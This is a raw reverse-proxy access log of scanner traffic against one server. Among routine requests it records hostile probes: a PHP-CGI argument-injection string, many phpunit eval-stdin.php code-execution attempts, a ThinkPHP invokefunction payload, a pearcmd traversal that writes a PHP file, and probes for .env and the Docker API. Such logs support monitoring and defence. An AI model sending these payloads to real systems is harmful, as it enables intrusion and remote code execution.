[Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:17:09:19 +0000] 200 - HEAD http 91.82.215.191 "/" [Client 176.65.148.66] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org )" "-" +[30/Jan/2026:17:09:19 +0000] 206 - GET http 91.82.215.191 "/" [Client 176.65.148.66] [Length 1033] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org )" "-" +[30/Jan/2026:17:09:20 +0000] 404 - HEAD http 91.82.215.191 "/_next" [Client 176.65.148.66] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org )" "-" +[30/Jan/2026:17:09:21 +0000] 405 - POST http 91.82.215.191 "/" [Client 176.65.148.66] [Length 154] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org )" "-" +[30/Jan/2026:17:09:22 +0000] 404 - POST http 91.82.215.191 "/_next" [Client 176.65.148.66] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org )" "-" +[30/Jan/2026:17:13:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:17:22:36 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:17:28:05 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:17:28:21 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:17:37:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 101.43.79.101] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[30/Jan/2026:17:40:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:17:48:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:17:50:55 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Googlebot-News" "-" +[30/Jan/2026:17:52:27 +0000] 200 - GET http 91.82.215.191 "/" [Client 46.23.108.183] [Length 568] [Gzip 1.86] "Mozilla/5.0" "-" +[30/Jan/2026:18:01:46 +0000] 400 - GET http localhost "/" [Client 80.82.70.133] [Length 252] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1" "-" +[30/Jan/2026:18:02:16 +0000] 400 - GET http 91.82.215.191 "/" [Client 80.82.77.202] [Length 252] [Gzip -] "fasthttp" "-" +[30/Jan/2026:18:02:16 +0000] 400 - GET http 91.82.215.191 "/aaa9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[30/Jan/2026:18:02:16 +0000] 400 - GET http 91.82.215.191 "/aab9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[30/Jan/2026:18:02:30 +0000] 400 - GET http 91.82.215.191 "/aaa9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[30/Jan/2026:18:02:30 +0000] 400 - GET http 91.82.215.191 "/aab9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[30/Jan/2026:18:12:08 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:18:13:34 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[30/Jan/2026:18:15:17 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:18:16:27 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:18:25:38 +0000] 200 - GET http 91.82.215.191 "/" [Client 192.227.159.123] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "-" +[30/Jan/2026:18:28:07 +0000] 404 - GET http 91.82.215.191 "/.env.development" [Client 176.65.149.17] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[30/Jan/2026:18:28:57 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[30/Jan/2026:18:31:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:18:33:54 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 205.210.31.109] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[30/Jan/2026:18:40:14 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:18:47:36 +0000] 404 - GET http 91.82.215.191 "/backup/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[30/Jan/2026:18:47:40 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[30/Jan/2026:18:48:40 +0000] 200 - GET http 91.82.215.191 "/" [Client 23.23.43.140] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[30/Jan/2026:18:54:08 +0000] 400 - - http localhost "-" [Client 78.128.112.74] [Length 154] [Gzip -] "-" "-" +[30/Jan/2026:18:59:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[30/Jan/2026:19:04:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:19:09:02 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:19:10:49 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:19:16:07 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:19:25:06 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:19:31:23 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:19:32:34 +0000] 200 - GET http 91.82.215.191 "/" [Client 31.129.235.153] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[30/Jan/2026:19:49:02 +0000] 400 - - http localhost "-" [Client 78.128.112.74] [Length 154] [Gzip -] "-" "-" +[30/Jan/2026:19:53:48 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:19:56:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:20:00:33 +0000] 404 - GET http 91.82.215.191 "/cluster/cluster/" [Client 54.233.41.185] [Length 183] [Gzip 3.21] "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[30/Jan/2026:20:00:35 +0000] 404 - GET http 91.82.215.191 "/script" [Client 56.124.15.89] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[30/Jan/2026:20:00:35 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 45.78.235.65] [Length 154] [Gzip -] "-" "-" +[30/Jan/2026:20:00:36 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 45.78.235.65] [Length 154] [Gzip -] "-" "-" +[30/Jan/2026:20:00:36 +0000] 404 - POST http 91.82.215.191 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:37 +0000] 405 - POST http 91.82.215.191 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 45.78.235.65] [Length 154] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:37 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:38 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:38 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:39 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:39 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:39 +0000] 404 - GET http 91.82.215.191 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:40 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:40 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:41 +0000] 404 - GET http 91.82.215.191 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:41 +0000] 404 - GET http 91.82.215.191 "/phpunit/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:41 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:42 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:42 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:43 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:43 +0000] 404 - GET http 91.82.215.191 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:44 +0000] 404 - GET http 91.82.215.191 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:44 +0000] 404 - GET http 91.82.215.191 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:44 +0000] 404 - GET http 91.82.215.191 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:45 +0000] 404 - GET http 91.82.215.191 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:45 +0000] 404 - GET http 91.82.215.191 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:46 +0000] 404 - GET http 91.82.215.191 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:46 +0000] 404 - GET http 91.82.215.191 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:47 +0000] 404 - GET http 91.82.215.191 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:47 +0000] 404 - GET http 91.82.215.191 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:47 +0000] 404 - GET http 91.82.215.191 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:48 +0000] 404 - GET http 91.82.215.191 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:48 +0000] 404 - GET http 91.82.215.191 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:49 +0000] 404 - GET http 91.82.215.191 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:49 +0000] 404 - GET http 91.82.215.191 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:50 +0000] 404 - GET http 91.82.215.191 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:50 +0000] 404 - GET http 91.82.215.191 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:50 +0000] 404 - GET http 91.82.215.191 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:51 +0000] 404 - GET http 91.82.215.191 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:51 +0000] 404 - GET http 91.82.215.191 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:52 +0000] 404 - GET http 91.82.215.191 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:52 +0000] 404 - GET http 91.82.215.191 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:52 +0000] 404 - GET http 91.82.215.191 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:53 +0000] 404 - GET http 91.82.215.191 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:53 +0000] 404 - GET http 91.82.215.191 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:54 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:54 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../tmp/index1" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:00:55 +0000] 404 - GET http 91.82.215.191 "/containers/json" [Client 45.78.235.65] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:04:17 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:20:23:44 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:20:24:01 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:20:35:37 +0000] 200 - GET http 91.82.215.191 "/" [Client 56.125.174.238] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" "-" +[30/Jan/2026:20:37:01 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[30/Jan/2026:20:43:19 +0000] 200 - GET http 91.82.215.191 "/" [Client 18.230.218.179] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15" "-" +[30/Jan/2026:20:43:54 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:20:44:58 +0000] 400 - - http localhost "-" [Client 78.128.112.74] [Length 154] [Gzip -] "-" "-" +[30/Jan/2026:20:45:09 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 185.252.86.27] [Length 154] [Gzip -] "-" "-" +[30/Jan/2026:20:45:10 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 185.252.86.27] [Length 154] [Gzip -] "-" "-" +[30/Jan/2026:20:45:10 +0000] 404 - POST http 91.82.215.191 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 185.252.86.27] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:45:10 +0000] 405 - POST http 91.82.215.191 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 185.252.86.27] [Length 154] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:45:10 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 185.252.86.27] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:20:45:17 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:20:48:52 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[30/Jan/2026:21:00:07 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:21:12:54 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:21:14:34 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:21:26:20 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:21:35:50 +0000] 200 - GET http 91.82.215.191 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[30/Jan/2026:21:37:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:21:40:08 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:21:55:28 +0000] 400 - GET http 91.82.215.191 "/" [Client 13.86.115.189] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[30/Jan/2026:21:55:28 +0000] 400 - - http localhost "-" [Client 13.86.115.189] [Length 154] [Gzip -] "-" "-" +[30/Jan/2026:22:01:22 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:22:02:25 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:22:10:20 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:22:11:16 +0000] 400 - - http localhost "-" [Client 78.128.112.74] [Length 154] [Gzip -] "-" "-" +[30/Jan/2026:22:15:27 +0000] 200 - GET http 91.82.215.191 "/" [Client 104.200.30.32] [Length 568] [Gzip 1.86] "ANK-WALK Internet Research Project - see https://your-domain.com" "-" +[30/Jan/2026:22:23:38 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 216.180.246.6] [Length 1033] [Gzip -] 